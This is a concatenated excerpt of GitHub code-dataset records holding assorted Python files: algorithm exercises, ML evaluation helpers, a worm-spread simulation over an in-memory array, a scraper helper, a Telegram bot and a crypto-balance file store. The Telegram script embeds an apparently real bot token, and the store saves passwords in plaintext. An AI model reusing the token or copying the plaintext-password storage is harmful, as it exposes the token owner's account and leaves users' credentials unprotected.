typing import List\n\n\nclass Solution:\n def maxPower(self, s: str) -> int:\n i, N = 0, len(s)\n res = 0\n while i < N:\n j = i + 1\n while j < N and s[i] == s[j]:\n j += 1\n res = max(res, j - i)\n i = j\n return res\n\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.maxPower(\"hooraaaaaaaaaaay\")\n print(result)\n","repo_name":"kenwoov/PlayLeetCode","sub_path":"Algorithms/Easy/1446. Consecutive Characters/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21355760004","text":"import sklearn.model_selection as ms\nimport sklearn.metrics as metrics\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier\nfrom collections import OrderedDict\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import validation_curve\n\ndef plot_validation_curve(model, X, y, param_name, param_range, cv=10):\n \"\"\"\n Plots validation curves for a varying parameter: the score on the training set and on the validation set as a function of the parameter value.\n :param model: the model\n :param X:\n :param y:\n :param param_name: name of the model parameter to vary, e.g. polynomialfeatures__degree\n :param param_range: array of parameter values\n :param cv: number of folds or a Fold object\n \"\"\"\n train_score, val_score = validation_curve(model, X, y, param_name, param_range, cv)\n plt.plot(param_range, np.median(train_score, 1), color='blue', label='training score')\n plt.plot(param_range, np.median(val_score, 1), color='red', label='validation score')\n plt.legend(loc='best')\n plt.ylim(0, 1)\n plt.xlabel('degree')\n plt.draw()\n plt.show()\n\ndef plot_roc_curve(y_test, predict):\n fpr, tpr, thresholds = metrics.roc_curve(y_test, predict)\n rc_score = metrics.roc_auc_score(y_test, predict)\n plt.title('ROC (AUC=%0.2f)' % (rc_score))\n plt.fill_between(fpr, tpr, alpha=0.2)\n plt.grid(True, linestyle='-', color='0.75')\n plt.plot(fpr, tpr, linewidth=2, label=\"roc\")\n plt.plot(fpr, thresholds, linewidth=1, label=\"thresholds\")\n plt.plot([0, 1], [0, 1], 'k--')\n plt.xlabel('fpr')\n plt.ylabel('tpr')\n plt.axis([0, 1, 0, 1])\n plt.draw()\n plt.show()\n\n\ndef plot_pr(y_test, predict):\n p, r, thresholds = metrics.precision_recall_curve(y_test, predict)\n\n plt.title('PR')\n plt.fill_between(r, p, alpha=0.2)\n plt.grid(True, linestyle='-', color='0.75')\n plt.plot(r, p, linewidth=2, label=\"roc\")\n plt.plot(r[:-1], thresholds, linewidth=1, label=\"thresholds\")\n plt.plot([0, 1], [0, 1], 'k--')\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.axis([0, 1, 0, 1])\n plt.draw()\n plt.show()\n\n\n\n\ndef selection_models(preprocess, train_data, n_splits=10, scoring='roc_auc', models=None):\n \"\"\"\n Runs cross-validation of the given models on the training set.\n The set must contain a column named after the target variable, target.\n :param preprocess: a prepared preprocessing object\n :param train_data: the dataset\n :param n_splits: number of dataset splits\n :param scoring: metric type used for validation\n :param models: list of models (configured instances)\n :return:\n \"\"\"\n if models is None:\n raise Exception(\"A list of models must be specified\")\n preprocessed = preprocess.preprocess_data(train_data)\n return selection_models2(preprocessed, n_splits, scoring, models)\n\n\ndef selection_models2(preprocessed, n_splits=10, scoring='roc_auc', models=None):\n \"\"\"\n Runs cross-validation of the given models on the training set.\n :param preprocessed:\n :param n_splits:\n :param scoring:\n :param models: model instance\n :return:\n \"\"\"\n if models is None:\n raise Exception(\"A list of models must be specified\")\n\n y = preprocessed.target\n x = preprocessed.drop([\"target\"], axis=1)\n\n cross_val_results = dict()\n\n for model in models:\n print(\" Processing model:\", type(model))\n scores = ms.cross_val_score(\n model,\n x,\n y,\n scoring=scoring,\n cv=ms.StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=123))\n\n cross_val_results[model] = {\n \"scores\": scores,\n \"variance\": np.var(scores),\n \"std\": np.std(scores),\n \"mean\": np.mean(scores)\n }\n\n return cross_val_results\n\n\ndef print_scores(scores):\n for m, sc in scores.items():\n print(\"=====\", m, \"=====\", \"\\n\")\n for k, v in sc.items():\n print(k, v, \"\\n\")\n\n\ndef random_forest_one_to_one_cols(pd_dataframe, target_name, scoring='roc_auc', n_splits=10, random_state=123):\n y = pd_dataframe.target\n x = pd_dataframe.drop([\"target\"], axis=1)\n\n cross_val_results = []\n\n for col in x.columns:\n print(\" Processing column:\", col)\n scores = ms.cross_val_score(\n RandomForestClassifier(),\n x[[col]],\n y,\n scoring=scoring,\n cv=ms.StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=random_state))\n\n cross_val_results.append({\n \"column\": col,\n \"std\": np.std(scores),\n \"mean\": np.mean(scores)\n })\n\n return sorted(cross_val_results, key=lambda t: t[\"mean\"])\n\n\ndef classification_exp(pd_dataframe, column_names, target_name, scoring='roc_auc', n_splits=10, random_state=123, model=RandomForestClassifier):\n y = pd_dataframe.target\n x = pd_dataframe.drop([target_name], axis=1)\n\n scores = ms.cross_val_score(\n model(),\n x[column_names],\n y,\n scoring=scoring,\n cv=ms.StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=random_state))\n\n print({\n \"std\": np.std(scores),\n \"mean\": np.mean(scores)\n })\n\n\ndef find_key_attrs(data, target_name):\n forest = RandomForestClassifier(n_estimators=400, oob_score=True)\n forest.fit(data.drop([target_name], axis=1), data[target_name])\n feature_importance = forest.feature_importances_\n feature_importance = 100.0 * (feature_importance / feature_importance.max())\n fi_threshold = 5\n important_idx = np.where(feature_importance > fi_threshold)[0]\n important_features = data.columns[important_idx]\n print(\"\\n\", important_features.shape[0], \"Important features(>\", fi_threshold, \"% of max importance)...\\n\")\n # important_features\n sorted_idx = np.argsort(feature_importance[important_idx])[::-1]\n # get the figure about important features\n pos = np.arange(sorted_idx.shape[0]) + .5\n # plt.subplot(1, 2, 2)\n plt.title('Feature Importance')\n plt.barh(pos, feature_importance[important_idx][sorted_idx[::-1]],\n color='r', align='center')\n plt.yticks(pos, important_features[sorted_idx[::-1]])\n plt.xlabel('Relative Importance')\n plt.draw()\n plt.show()\n print(important_features[sorted_idx[::-1]])\n\n\n\n# It is no secret that often the most important part of solving a problem is the ability to select, and even create, the right features. In the English-language literature this is called Feature Selection and Feature Engineering. While Feature Engineering is a rather creative process that relies mostly on intuition and expert knowledge, a large number of ready-made algorithms already exist for Feature Selection. Tree-based algorithms allow computing feature importances:\n#\n# from sklearn import metrics\n# from sklearn.ensemble import ExtraTreesClassifier\n# model = ExtraTreesClassifier()\n# model.fit(X, y)\n# # display the relative importance of each attribute\n# print(model.feature_importances_)\n#\n#\n# All the other methods are in one way or another based on an efficient search over subsets of features, aiming to find the best subset on which the trained model gives the best quality. One such search algorithm is Recursive Feature Elimination, which is also available in the Scikit-Learn library:\n#\n# from sklearn.feature_selection import RFE\n# from sklearn.linear_model import LogisticRegression\n# model = LogisticRegression()\n# # create the RFE model and select 3 attributes\n# rfe = RFE(model, 3)\n# rfe = rfe.fit(X, y)\n# # summarize the selection of the attributes\n# print(rfe.support_)\n# print(rfe.ranking_)\n","repo_name":"lightway82/sfml","sub_path":"hw_03/project/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33895816391","text":"# Adding 1, 2 and 3 (Baekjoon problem '1,2,3 더하기')\n\ndef dfs(n, hap):\n ans=0\n if hap==n:\n ans+=1\n if hap>=n:\n return ans\n for i in range(1, 4):\n ans+=dfs(n, hap+i)\n return ans\n\nt=int(input())\n#3\n#4 7 10\nfor _ in range(t):\n n=int(input())\n ans=0\n for i in range(1,4):\n ans+=dfs(n, i)\n print(ans)\n","repo_name":"Greek-and-Roman-God/Athena","sub_path":"codingtest/week12/plus_1_2_3.py","file_name":"plus_1_2_3.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5590363952","text":"def find_smallest(lst):\n smallest_index = 0\n smallest_item = lst[0]\n for i in range(1, len(lst)):\n if smallest_item > lst[i]:\n smallest_item = lst[i]\n smallest_index = i\n return smallest_index\n\n\ndef selection_sort(lst):\n new_lst = []\n for i in range(len(lst)):\n small_index = find_smallest(lst)\n new_lst.append(lst.pop(small_index))\n return new_lst\n\n\nif __name__ == '__main__':\n print(selection_sort([4, 9, 7, 5, 3, 8]))\n","repo_name":"chenyang929/grokking_algorithms","sub_path":"02 选择排序/02_selection_sort.py","file_name":"02_selection_sort.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20167732352","text":"import datetime\nimport json\nimport logging\nimport os\nfrom typing import Union, Any\n\nlogger = logging.getLogger(\"metricsGatherer.utils\")\n\n\ndef read_file(folder: str, filename: str) -> str:\n \"\"\"Read file content as string (UTF-8)\"\"\"\n with open(os.path.join(folder, filename), \"r\") as file:\n return file.read()\n\n\ndef read_json_file(folder: str, filename: str, to_json=False) -> Union[str, Any]:\n \"\"\"Read fixture from file\"\"\"\n content = read_file(folder, filename)\n return content if not to_json else json.loads(content)\n\n\ndef is_the_time_for_task_starting(allowed_start_time, allowed_end_time):\n start = datetime.time(int(allowed_start_time.split(\":\")[0]), int(allowed_start_time.split(\":\")[1]))\n end = datetime.time(int(allowed_end_time.split(\":\")[0]), int(allowed_end_time.split(\":\")[1]))\n now_time = datetime.datetime.now().time()\n if start > end:\n return (now_time >= start and now_time <= datetime.time(23, 59)) or \\\n (now_time >= datetime.time(0, 0) and now_time <= end)\n 
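# NOTE: the branch above handles allowed windows that wrap past midnight, e.g. start=22:00, end=06:00 is treated as [22:00, 23:59] or [00:00, 06:00]; the plain range check below covers the non-wrapping case, e.g. start=09:00, end=18:00.\n    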
return now_time >= start and now_time <= end\n\n\ndef take_the_date_to_check():\n now_time = datetime.datetime.now().time()\n if (now_time >= datetime.time(12, 0) and now_time <= datetime.time(23, 59)):\n return datetime.datetime.now()\n return datetime.datetime.now() - datetime.timedelta(days=1)\n\n\ndef parse_conditions(conditions):\n parsed_conditions = []\n for condition in conditions.split(\"|\"):\n if not condition.strip():\n continue\n chosen_operator = \"\"\n for operator in [\">=\", \"<=\", \"==\", \"=\", \"<\", \">\"]:\n if operator in condition:\n chosen_operator = operator\n break\n condition_changed = condition.replace(chosen_operator, \" \").split()\n if len(condition_changed) == 2:\n metric_score = None\n try:\n metric_score = int(condition_changed[1].strip())\n except: # noqa\n try:\n metric_score = float(condition_changed[1].strip())\n except: # noqa\n pass\n if metric_score is not None:\n parsed_conditions.append(\n (condition_changed[0].strip(), chosen_operator, metric_score))\n return parsed_conditions\n\n\ndef compare_metrics(cur_metric, metric_threshold, operator):\n if operator == \">=\":\n return cur_metric >= metric_threshold\n if operator == \">\":\n return cur_metric > metric_threshold\n if operator == \"<=\":\n return cur_metric <= metric_threshold\n if operator == \"<\":\n return cur_metric < metric_threshold\n if operator in [\"==\", \"=\"]:\n return cur_metric == metric_threshold\n return False\n","repo_name":"reportportal/service-metrics-gatherer","sub_path":"app/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29019723337","text":"import pytest\n\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.http.response import HttpResponse\nfrom sys import platform\n\n\nMAC_OS = platform == 'darwin'\n\n\n@pytest.mark.skipif(condition=not MAC_OS,\n reason='TVM not working with Docker for Mac due to IPv6')\n@pytest.mark.usefixtures('enable_tvm_middleware')\ndef test_ping(client):\n \"\"\"\n Тест вьюхи с пингом\n \"\"\"\n response = client.get('/ping/')\n assert response.status_code == 200\n assert response.content.decode() == 'pong'\n\n\n@pytest.mark.django_db\ndef test_auth_ping(jclient):\n \"\"\"\n Тест пинга с авторизацией, проверка самого `jclient`\n \"\"\"\n auth_ping_url = reverse('auth_ping')\n\n # делаем запрос без авторизации\n response = jclient.get(auth_ping_url)\n assert response.status_code == 401\n\n # авторизовываемся и делаем запрос\n jclient.login()\n response = jclient.get(auth_ping_url)\n assert response.status_code == 200\n assert response.content.decode() == 'pong'\n\n # разлогиниваемся\n jclient.logout()\n response = jclient.get(auth_ping_url)\n assert response.status_code == 401\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/integration_tests/kelvin/common/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8249345557","text":"import random\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\nruns = 3\r\nOMEGA = 100000\r\nTotal_vulnerable_ip = 1000\r\ntotal_simulation_steps = 10000\r\nSCAN_RATE = 5\r\n\r\n\r\ndef initialize_ip_address_state():\r\n ip_addr_space = ['immune' for i in range(OMEGA+1)]\r\n for i in range(int(100/10)):\r\n for j in range(1, 101):\r\n ip_addr_space[j + (i * 
10000)] = 'vulnerable'\r\n #print(ip_addr_space[j+ (i * 10000)])\r\n return ip_addr_space\r\n\r\n\r\n\r\ndef worm_propagation(ip_addr_state, method):\r\n infected_ip_count_discrete = []\r\n num_of_infected_ip = 1\r\n\r\n for tick in range(total_simulation_steps):\r\n num_of_ips_to_scan = num_of_infected_ip * SCAN_RATE\r\n if method == 'random_scan':\r\n infected_ips = random.sample(range(1, OMEGA + 1), num_of_ips_to_scan)\r\n elif method == 'local_preference':\r\n infected_ips = get_local_ips(ip_addr_state)\r\n elif method == 'seqential':\r\n infected_ips = sequential_scan(ip_addr_state, num_of_ips_to_scan)\r\n# print(infected_ips)\r\n for ip in infected_ips:\r\n if ip_addr_state[ip] == 'vulnerable':\r\n ip_addr_state[ip] = 'infected'\r\n num_of_infected_ip += 1\r\n if num_of_infected_ip == Total_vulnerable_ip:\r\n break\r\n\r\n if (tick + 1) % 100 == 0:\r\n print(\"Time steps: {0} ---- IPs_infected: {1}\".format(tick + 1, num_of_infected_ip))\r\n infected_ip_count_discrete.append(num_of_infected_ip)\r\n if num_of_infected_ip == Total_vulnerable_ip:\r\n print(\"Time steps: {0} ---- IPs_infected: {1}. \\nAll IPs infected!!!\".format(tick + 1,\r\n num_of_infected_ip))\r\n break\r\n return infected_ip_count_discrete\r\n\r\n\r\ndef plot_simulation(count, run):\r\n plt.plot(count, \"-\", label=\"Run #{}\".format(run + 1))\r\n\r\n\r\ndef worm_propagation_simulation(method, plot=False):\r\n for run in range(runs):\r\n print(\"\\n ****** {} Scan worm propagation: Run{}******\".format(method, run+1))\r\n ip_addr_state = initialize_ip_address_state()\r\n # print([i for i, x in enumerate(ip_addr_state) if x == 'immune'])\r\n ip_addr_state[10050] = 'infected'\r\n infected_ip_count_discrete = worm_propagation(ip_addr_state, method)\r\n if plot:\r\n plot_simulation(infected_ip_count_discrete, run)\r\n if plot:\r\n plt.xlabel(\"Time tick\")\r\n plt.ylabel(\"Number of infected computers\")\r\n plt.title(\"{}: 3 Simulation Runs of Worm Propagation\".format(method))\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef main():\r\n random.seed(1)\r\n methods = ['random_scan']\r\n for method in methods:\r\n worm_propagation_simulation(method, plot=True)\r\n\r\n\r\nmain()\r\n\r\n\r\n","repo_name":"ashishj22606/Worm-Propogation-Simulator","sub_path":"random_scan.py","file_name":"random_scan.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29895598024","text":"from isotonic_regression_l1_total_order import isotonic_regression_l1_total_order\nimport numpy as np\nimport random\n\ndef isotonic_regression_l1_total_order_decrease(y,w):\n return -isotonic_regression_l1_total_order(-y,w)\n\n\ndef solve_minimization(y, S):\n\n increase = True\n j = 0\n s = len(S)\n x = np.zeros_like(y)\n x[:S[j]] = isotonic_regression_l1_total_order(y[:S[j]], np.ones(S[j]))\n for j in range(0,s-1):\n increase = not increase\n if increase:\n x[S[j]:S[j+1]] = isotonic_regression_l1_total_order(y[S[j]:S[j+1]], np.ones(S[j+1]-S[j]))\n else:\n x[S[j]:S[j+1]] = isotonic_regression_l1_total_order_decrease(y[S[j]:S[j+1]], np.ones(S[j+1]-S[j]))\n x[S[-1]:] = isotonic_regression_l1_total_order_decrease(y[S[-1]:], np.ones(len(y)-S[-1]))\n return x, np.sum(np.abs(x-y))\n\ndef peak_finder_random_search(y,n_peaks,n_trials = 1000):\n n = len(y)\n x_best = []\n S_best = []\n opt_best = np.Inf\n for _ in range(n_trials):\n S = sorted(random.sample(range(n), 2*n_peaks-1))\n x, opt = solve_minimization(y,S)\n if opt < opt_best:\n x_best = x\n S_best = S\n 
opt_best = opt\n return x_best, S_best, opt_best\n\ndef peak_finder_improve(y, S_best, opt_best):\n n = len(y)\n s = len(S_best)\n for j in range(s):\n S = [S_best[k] for k in range(s)]\n if (S[j]-1 >= 0):\n if (j == 0) or (S[j]-1 > S[j-1]):\n S[j] -= 1\n x_test, opt_test = solve_minimization(y,S)\n if opt_test < opt_best:\n return x_test, S, opt_test\n S = [S_best[k] for k in range(s)]\n if (S[j] + 1 < n):\n if (j==s-1) or (S[j]+1 < S[j+1]):\n S[j] += 1\n x_test, opt_test = solve_minimization(y,S)\n if opt_test < opt_best:\n return x_test, S, opt_test\n return [], S_best, opt_best\n\ndef peak_finder(y,n_peaks,n_trials= 1000):\n if n_peaks == 0:\n x_inc = isotonic_regression_l1_total_order(y,np.ones_like(y))\n x_dec = isotonic_regression_l1_total_order_decrease(y,np.ones_like(y))\n opt_inc = np.sum(np.abs(y-x_inc))\n opt_dec = np.sum(np.abs(y-x_dec))\n if opt_inc > opt_dec:\n return [], x_dec, opt_dec\n else:\n return [], x_dec, opt_inc\n if n_peaks == 1:\n S = [0]\n x,opt = solve_minimization(y, [0])\n for i in range(1,len(y)):\n x_imp,opt_imp = solve_minimization(y, [i])\n if opt_imp < opt:\n x,opt = x_imp,opt_imp\n S = [i]\n return S,x,opt\n else:\n x,S,opt = peak_finder_random_search(y, n_peaks, n_trials)\n x_imp, S_imp, opt_imp = peak_finder_improve(y, S, opt)\n j = 0\n while opt_imp < opt:\n j += 1\n x,S,opt = x_imp, S_imp, opt_imp\n x_imp, S_imp, opt_imp = peak_finder_improve(y, S, opt)\n return S[::2],x,opt\n\ndef peak_finder_auto(y,n_peaks_max = 3, sensitivity=0.05):\n S_list = []\n x_list = []\n opt_list = []\n for n_peaks in range(n_peaks_max+2):\n\n S,x,opt = peak_finder(y,n_peaks)\n S_list.append(S)\n x_list.append(x)\n opt_list.append(opt)\n improvement = np.diff(-np.array(opt_list))\n n_peaks = 1\n while n_peaks < n_peaks_max and improvement[n_peaks] > sensitivity*improvement[n_peaks-1]:\n n_peaks += 1\n# n_peaks = np.argmax()\n return S_list[n_peaks], x_list[n_peaks], opt_list[n_peaks]","repo_name":"YutongWangUMich/peak_finder","sub_path":"peak_finder.py","file_name":"peak_finder.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20237298350","text":"class Song(object):\n \"음악의 메타 정보\"\n \n def __init__(self):\n self.dbid = ''\n self.uid = ''\n self.title = ''\n self.artist = ''\n self.url = ''\n self.img_url = ''\n self.description = ''\n self.duration = 0\n self.created_at = None\n self.played_count = 0\n\n def __str__(self):\n s = []\n s.append('Song: ')\n if(self.dbid):\n s.append(' - id: {}'.format(self.dbid))\n if(self.uid):\n s.append(' - uid: ' + self.uid) \n if(self.title):\n s.append(' - title: ' + self.title)\n if(self.artist):\n s.append(' - artist: ' + self.artist)\n if(self.url):\n s.append(' - url: ' + self.url)\n if(self.img_url):\n s.append(' - img: ' + self.img_url)\n s.append(' - played count: {}'.format(self.played_count))\n\n return '\\n'.join(s)\n\n def to_dict(self):\n ret = {}\n ret[\"dbid\"] = self.dbid\n ret[\"uid\"] = self.uid\n ret[\"title\"] = self.title\n ret[\"artist\"] = self.artist\n ret[\"url\"] = self.url\n ret[\"img_url\"] = self.img_url\n ret[\"description\"] = self.description\n ret[\"duration\"] = self.duration\n ret[\"created_at\"] = self.created_at\n ret[\"played_count\"] = self.played_count\n\n return 
ret\n","repo_name":"jinniahn/book_python_example","sub_path":"ch13/song.py","file_name":"song.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"20108786382","text":"# -*- coding:utf-8 -*-\n\n\nfrom lxml import etree\n\n\ndef linkstr(content):\n dom = etree.HTML(content)\n try:\n if ('//*[@id=\"fcNav\"]/em/a[1]') != None:\n url_list = dom.xpath('//*[@id=\"fcNav\"]/em/a[1]')\n # 判断是否有其他二级域名\n if dom.xpath('//*[@id=\"fcNav\"]/em/a[2]') != None:\n url_list.append((dom.xpath('//*[@id=\"fcNav\"]/em/a[2]'))[0])\n if dom.xpath('//*[@id=\"fcNav\"]/em/a[3]') != None:\n url_list.append((dom.xpath('//*[@id=\"fcNav\"]/em/a[3]'))[0])\n except:\n print('官方个别分站内容未填充,已跳过。。。')\n\n\n second_link = []\n\n for urls in url_list:\n if len(urls.attrib) != 0:\n # print urls.attrib['href']\n second_link.append(urls.attrib['href'])\n\n # print second_link\n return second_link\n\n\nimport requests\nimport Useragent\n\n# url = \"http://qd.58.com\"\n\n# UA = {\"User-Agent\": Useragent.RandomUAMiddleware().process_request()}\n#\n#\n# def gethtml(url, *args):\n# html = requests.get(url, *args).content\n#\n# return html\n\n# def main():\n# linkstr()\n#\n# main()\n","repo_name":"Big-data-spider/58spider","sub_path":"pro_files/link2nd_tool.py","file_name":"link2nd_tool.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33988820452","text":"# coding=utf-8\r\nfrom utils import crcUtils\r\nfrom utils.crcUtils import CrcUtils\r\nfrom utils.strUtils import StrUtils\r\nfrom utils.byteUtils import ByteUtils\r\n\r\n\r\nclass RealInstruction:\r\n # 模式选项\r\n MODE_CLICK = 0x00 # 点动模式\r\n MODE_STEP = 0x01 # 单步模式\r\n MODE_AUTO = 0x02 # 自动模式\r\n MODE_RETURN = 0x03 # 单次往返\r\n MODE_RETURN_TIME = 0x04 # 按次往返\r\n MODE_CLICK_ZERO = 0x05 # 按键回零单方向\r\n MODE_FORWARD_ZERO = 0x06 # 前进回零往返模式\r\n MODE_DIRECTORY_ZERO = 0x07 # 单方向运行模式\r\n # 运动方向\r\n MOVE_PLUS = 0x01\r\n MOVE_MINUS = 0x02\r\n MOVE_STOP = 0x003\r\n # 标志位\r\n FLAG_LAUNCH = 0\r\n FLAG_ENABLE = 0\r\n FLAG_ZERO = 1\r\n FLAG_URGENT_STOP = 2\r\n FLAG_LIMIT_POSITION = 3\r\n FLAG_02_OUT = 4\r\n FLAG_SINGLE_SWITCH_TRIGGER = 5\r\n FLAG_INPUT_SWITCH_TRIGGER_DISABLED = 6\r\n FLAG_POSITION_CONTROL = 7\r\n\r\n def __init__(self):\r\n self.header = 0xBA # 包头\r\n self.mode = 0x00 # 运动模式\r\n\r\n self.frequencyDivision = 0x0000 # 分频基数,字节顺序:高位低位\r\n self.controllerCode = 0x00 # 控制器编号\r\n self.moveTime = 0x00 # 执行次数,(提示:只在04:按次往返模式时有效)\r\n self.moveDirectory = 0x01 # 01 :正运行02 :负运行03 :停止\r\n\r\n # 数据标志位\r\n self.moveFlag = 0x00 # 本字节拆分数据位8位11111111 (1:代表常开、使能启动 0:代表常闭、不启动)\r\n # 如例:11111111 (例中全部有效位) 代表:依次排序从左至右位,启动上电运行使能、启动上电回零使能、急停常开、限位常开、启动0.2 倍频率输出、启动单开关触发、启动输入开关失效、启动位置控制使能、\r\n # 例中串口应发数据:FF\r\n\r\n self.movePulse = 0x000000 # 行进脉冲总数高位、中位、低位\r\n self.acceleratePulse = 0x00 # 加速脉冲数高位、低\r\n self.deceleratePulse = 0x00 # 降速脉冲数高位、低\r\n self.crc = 0x00\r\n self.tail = 0xFE\r\n\r\n def package(self):\r\n byte_codes = bytearray()\r\n byte_codes.append(self.header)\r\n byte_codes.append(self.mode)\r\n ByteUtils.concatBytes(byte_codes, ByteUtils.int2bytes2(self.frequencyDivision))\r\n byte_codes.append(self.controllerCode)\r\n byte_codes.append(self.moveTime)\r\n byte_codes.append(self.moveDirectory)\r\n byte_codes.append(self.moveFlag)\r\n str_val = StrUtils.bytesToStr(byte_codes)\r\n print(str_val)\r\n ByteUtils.concatBytes(byte_codes, ByteUtils.int2bytes3(self.movePulse))\r\n 
ByteUtils.concatBytes(byte_codes, ByteUtils.int2bytes2(self.acceleratePulse))\r\n ByteUtils.concatBytes(byte_codes, ByteUtils.int2bytes2(self.deceleratePulse))\r\n crc = CrcUtils.GenModbusCRC8(byte_codes)\r\n byte_codes.append(crc)\r\n byte_codes.append(self.tail)\r\n return byte_codes\r\n\r\n\r\nif __name__ == '__main__':\r\n ins = RealInstruction()\r\n ins.package()\r\n","repo_name":"whw917/calibration_platform","sub_path":"pymac/entities/realInstruction.py","file_name":"realInstruction.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70477860242","text":"#!/usr/bin/python3\n\nimport telepot\nfrom time import sleep\n\nTOKEN = '971551324:AAGz8COn-WvxBWbbr_0N5bjeJVyIAAu487A'\n\ndef telegram_sendMessage(msg_telegram):\n TelegramBot = telepot.Bot(TOKEN)\n msg_counter = 0\n msg = TelegramBot.getUpdates()\n for element in msg:\n for key, value in element.items():\n if 'message' in key:\n chat_id = str(value['chat']['id']) # catchear si no existe chat_id\n print('mensaje ' + str(msg_counter) + ': ' + str(value['text']))\n msg_counter += 1\n TelegramBot.sendMessage(chat_id=chat_id, parse_mode = 'html', text='========================== ')\n TelegramBot.sendMessage(chat_id=chat_id, parse_mode = 'html', text='Nuevo mensaje: ' + str(msg_telegram))\n\n\nTelegramBot = telepot.Bot(TOKEN)\n#print(TelegramBot.getMe())\n#print(TelegramBot.getUpdates())\n\ni = 0\nwhile True:\n i += 1\n telegram_sendMessage('probando mensaje ' + str(i))\n sleep(5)\n","repo_name":"joagonzalez/ditella-siyt","sub_path":"src/api_example/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70114156562","text":"from domain.Cryptobalance import *\nimport os\n\nstorage_folder = \"../storage\"\nscript_dir = os.path.dirname(os.path.abspath(__file__))\nfolder = os.path.join(script_dir, storage_folder)\n\ndef register_transaction(date,user_id,operation_type,symbol,amount,total_price):\n formate_date = str(date.strftime('%d/%m/%Y %H:%M:%S'))\n archivo=open(f'{folder}/user{user_id}/hystoric_file', 'a+')\n archivo.write(f'{formate_date}|{symbol}|{user_id}|{operation_type}|{str(amount)}|{str(total_price)} \\n')\n archivo.close()\n\ndef line_balance_register(logged_user,symbol,amount):\n newCriptobalance = Cryptobalance(symbol,amount)\n file=open(f'{folder}/user{logged_user}/balance.txt','a+') \n file.write(f'{newCriptobalance.symbol}|{newCriptobalance.amount}')\n file.close()\n\ndef user_registration(user_id,user_password):\n file=open(f'{folder}/users.txt', 'a+')\n file.write(f'USER:{user_id}|PW:{user_password}\\n')\n file.close()\n \ndef get_currencies_balance(user_id, symbol):\n balance_file = open(f'{folder}/user{user_id}/balance.txt', 'r')\n txt = balance_file.read()\n file_size = os.path.getsize(f'{folder}/user{user_id}/balance.txt')\n if file_size == 0:\n return {}\n balance_file.close()\n criptos_balance = {}\n for line in txt.splitlines():\n newCryptobalance = parse_reg(line)\n criptos_balance[newCryptobalance.symbol] = newCryptobalance\n\n return criptos_balance\n\ndef get_currencye_amount(user_id,symbol):\n balance = get_currencies_balance(user_id,symbol)\n if symbol in balance:\n return balance[symbol].amount\n\n return 0\n\n\ndef parse_reg(register):\n separator = register.split(\"|\")\n return Cryptobalance(separator[0],float(separator[1]))\n\ndef 
make_balance_reg(criptobalance):\n return (f'{criptobalance.symbol}|{criptobalance.amount} \\n')\n \ndef get_obj(symbol,amount):\n newCriptobalance = Cryptobalance(symbol,amount)\n return newCriptobalance\n \ndef get_criptobalance(user_id,symbol):\n balance = get_currencies_balance(user_id,symbol)\n if symbol in balance:\n return balance[symbol]\n else:\n return None\n\ndef last_userid():\n file = open(f'{folder}/users.txt', 'r')\n txt = file.read()\n file.close()\n lines = txt.splitlines()\n terms = txt.split(\"|\")\n for line in lines:\n termino = line.split(\"|\")\n x = termino[0]\n return x \n \ndef check_id_exist(user_id):\n\n with open(f'{folder}/users.txt') as txt:\n if f'USER:{user_id}' in txt.read():\n return True\n return False\n\ndef check_id_pass(user_id,user_password):\n file = open(f'{folder}/users.txt', 'r')\n txt = file.read()\n file.close()\n lines = txt.splitlines()\n terms = txt.split(\"|\")\n for line in lines:\n if f'USER:{user_id}|PW:{user_password}' in line:\n return True\n\n return False\n\ndef create_a_folder(user_id):\n if not os.path.exists(f'{folder}/user{user_id}'):\n os.makedirs(f'{folder}/user{user_id}')\n\ndef create_filebalance(user_id):\n file = open(f'{folder}/user{user_id}/balance.txt', 'w+')\n file.close()\n\n","repo_name":"franciscoo11/nextu-python","sub_path":"services/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40020292720","text":"'''\n# Fancy string 